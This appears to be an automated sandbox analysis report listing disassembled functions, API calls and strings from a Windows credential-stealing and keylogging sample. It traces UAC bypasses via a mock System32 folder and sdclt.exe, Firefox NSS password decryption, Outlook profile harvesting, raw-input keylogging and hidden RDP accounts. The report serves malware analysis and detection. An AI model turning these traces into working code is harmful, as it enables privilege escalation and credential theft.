                                                                            • API String ID:
                                                                            • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                            • Instruction ID: 857fa1df320f071ac117177b4bc81004f99221c297faafc14dd0d3c935e2cdac
                                                                            • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                            • Instruction Fuzzy Hash: 06E0C233608510CBC760DB19D4009D6F3F6EF9037072A046AE65BA3631E328FC82C758
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411E6D Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                            • Instruction ID: b4343b720a6aa60280e87e62ebe2b10670a5d6abc93b7d24aa6a6a1121a5b049
                                                                            • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                            • Instruction Fuzzy Hash: 8AD0EA38361A408FCB51CF18C584E01B3E4EB49760B098491E905CB735DB38EC40EA40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00411B38 Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412F55 Relevance: 59.7, APIs: 23, Strings: 11, Instructions: 151fileregistrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,0040555F,?,?,00000000,00000000,?,?,?,00405909,?,00000000,00000000), ref: 00412F7F
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                                                            • lstrcatW.KERNEL32(?,\winSAT.exe), ref: 00412FF7
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                                                            • lstrcatW.KERNEL32(?,\winmm.dll), ref: 00413029
                                                                            • CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                                                            • CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                                                            • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                                                            • CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                                                              • Part of subcall function 00412F0D: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,746CFE60,746CF560,?,?,0041306C), ref: 00412F2C
                                                                              • Part of subcall function 00412F0D: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                                                            • RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                                                            • IsWow64Process.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041309B
                                                                            • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130B6
                                                                            • CreateFileW.KERNEL32(\\?\C:\Windows \System32\WINMM.dll,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004130CF
                                                                            • WriteFile.KERNEL32(00000000,00420408,00003000,?,00000000), ref: 004130E7
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 004130EE
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00413112
                                                                            • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0041311B
                                                                            • Sleep.KERNEL32(000007D0), ref: 00413126
                                                                            • ExitProcess.KERNEL32 ref: 0041312D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CreateProcessWow64$CloseDirectory$CopyCurrentHandleOpenRedirectionSystemTokenlstrcat$ChangeDisableExecuteExitFindInformationModuleNameNotificationRevertShellSleepValueWrite
                                                                            • String ID: <$C:\Windows \System32\winSAT.exe$Virtual Machine Platform$\\?\C:\Windows \$\\?\C:\Windows \System32$\\?\C:\Windows \System32\WINMM.dll$\\?\C:\Windows \System32\winSAT.exe$\\?\C:\Windows \System32\winmmd.dll$\winSAT.exe$\winmm.dll$formal
                                                                            • API String ID: 1410773947-2038174052
                                                                            • Opcode ID: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                                                            • Instruction ID: 38432614936820ae09a91b85de116fe05e5ca363bce1e2b84a591d1acda27bec
                                                                            • Opcode Fuzzy Hash: 030c532d15d01d55ddb18d83e7d6d465989f293f85a1660a9534233c15bfab61
                                                                            • Instruction Fuzzy Hash: E9413371940258BBDB219BE1DC49ECF7FBCEF45710F104066F605E2190DB785A85CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040ADE3 Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                            • PathFileExistsW.SHLWAPI(00409EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0040AF08
                                                                            • PathFileExistsW.SHLWAPI(00409EC5,.dll,?,00409EC5,?,00000104,00000000), ref: 0040AF64
                                                                            • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                                                            • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                                            • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                                            • API String ID: 410702425-850564384
                                                                            • Opcode ID: 47d2ac6b77324ba3849da9a1a7d6581cac49add9d22247d6f8be81dbde9b4174
                                                                            • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                                                            • Opcode Fuzzy Hash: 47d2ac6b77324ba3849da9a1a7d6581cac49add9d22247d6f8be81dbde9b4174
                                                                            • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408793 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                                                            • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                                                            • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                                                            • GetForegroundWindow.USER32 ref: 00408859
                                                                            • GetWindowTextW.USER32 ref: 0040886A
                                                                            • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                                                            • PostQuitMessage.USER32(00000000), ref: 00408AE6
                                                                            • RegisterRawInputDevices.USER32 ref: 00408B15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                                            • String ID: Unknow
                                                                            • API String ID: 3853268301-1240069140
                                                                            • Opcode ID: bda412528f793fa025824fa0e528a0f5e4ff1e42c6c4c69d7bf37ae6962adb62
                                                                            • Instruction ID: 458c7b85aa02a6c7404881c9d8865e4587a04225f5986bfff7961e81c5bb117e
                                                                            • Opcode Fuzzy Hash: bda412528f793fa025824fa0e528a0f5e4ff1e42c6c4c69d7bf37ae6962adb62
                                                                            • Instruction Fuzzy Hash: BEA18E71204200AFC710EF65DC89EAB7BB8EF84344F44857EF985A72A1DB35D905CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040983D Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                                                            • lstrcpyW.KERNEL32 ref: 00409904
                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                                                            • lstrcpyW.KERNEL32 ref: 00409972
                                                                            • lstrcatW.KERNEL32(?,004176A4), ref: 00409980
                                                                            • lstrcatW.KERNEL32(?,?), ref: 00409994
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                                                            Strings
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                                                            • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                                            • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                                            • API String ID: 1891545080-2020977430
                                                                            • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                                                            • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                                                            • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                                                            • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041313A Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90sleepregistrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,77C30770,00000000,77C30770,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                              • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                            • CloseHandle.KERNEL32(?,00000000), ref: 00413159
                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                                                            • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 004131EA
                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00413234
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                                                            • Sleep.KERNEL32(000007D0), ref: 00413256
                                                                            • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                                                            • ExitProcess.KERNEL32 ref: 0041326D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
                                                                            • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                                            • API String ID: 368901745-2081737068
                                                                            • Opcode ID: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                                                            • Instruction ID: 1975b8516974a034e8a1e4695efa9b733e37ae44b87f84d9a85a70a28b88c4fa
                                                                            • Opcode Fuzzy Hash: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                                                            • Instruction Fuzzy Hash: 5931AE71C42118BBCB10AFA0DC48EDEBB7CEF44315F1040AAF909E2250D7785A95CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407F94 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135windowstringfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                                                            • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00408013
                                                                            • GetLocalTime.KERNEL32(?), ref: 0040801A
                                                                            • wsprintfW.USER32 ref: 0040804E
                                                                            • lstrcatW.KERNEL32(-00000010,?), ref: 00408065
                                                                            • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 00408091
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,746B82B0,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                                                            • GetMessageA.USER32 ref: 00408114
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            • TranslateMessage.USER32(?), ref: 004080FB
                                                                            • DispatchMessageA.USER32 ref: 00408106
                                                                            Strings
                                                                            • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                                                            • c:\windows\system32\user32.dll, xrefs: 004080AF
                                                                            • \Microsoft Vision\, xrefs: 0040800D
                                                                            • SetWindowsHookExA, xrefs: 004080C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                                            • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                                            • API String ID: 1641748825-3884914687
                                                                            • Opcode ID: c668a5f024ff913b74e60542ff3822fb5aa950f5131d420532d881c56a5bd9a1
                                                                            • Instruction ID: 6c2511fb03697e5af89a4dd955d9eabc72836af2c0e76f94d97bcee5e6e5c3d3
                                                                            • Opcode Fuzzy Hash: c668a5f024ff913b74e60542ff3822fb5aa950f5131d420532d881c56a5bd9a1
                                                                            • Instruction Fuzzy Hash: 15418271604300ABD3209BA9EC49FAB77ECEBC8748F00486EFA45D3291DA79D945C769
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004085CB Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?), ref: 004085F4
                                                                            • GetWindowTextW.USER32 ref: 00408607
                                                                            • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                                                            • lstrcpyW.KERNEL32 ref: 004086BD
                                                                            • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 004086DE
                                                                            • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                                                            • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                                                            • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 00408737
                                                                            • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                                                            • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                                                            • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 00408780
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$File$Write$Window$CloseCreateDispatcherExceptionForegroundFreeHandleTextUserVirtuallstrcatlstrcpy
                                                                            • String ID: {Unknown}
                                                                            • API String ID: 4210971544-4054869793
                                                                            • Opcode ID: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                                                            • Instruction ID: 21f225d70ee6afc1dcb4dd19440159f35fb949404d55de6ac3cc6466c0fc773e
                                                                            • Opcode Fuzzy Hash: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                                                            • Instruction Fuzzy Hash: EF515F71A40208AFC710EB55DC89FDE7BB9EF44348F0580BAB905A72A1DB759E41CB5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040E29A Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 237registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                                                            • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                                                            • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                                                              • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                                                            • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                                                            • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leavelstrlen$CloseCreateDeleteDispatcherEnterExceptionFreeInitializeOpenUserValueVirtuallstrcpy
                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                                                            • API String ID: 122403018-177601018
                                                                            • Opcode ID: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                                                            • Instruction ID: 0a479e188c8e80083ad3493b7ec29c52a1503be388f48136fafe1c7c6f2d3922
                                                                            • Opcode Fuzzy Hash: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                                                            • Instruction Fuzzy Hash: 1B7192706005187ACB05BB62CC62EEE7B78EF4431AB00453FB906B62D2DB3C5A45CA99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041001A Relevance: 19.6, APIs: 13, Instructions: 135pipethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32 ref: 0040FFB4
                                                                              • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                                                              • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                                                              • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                                                            • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0041008C
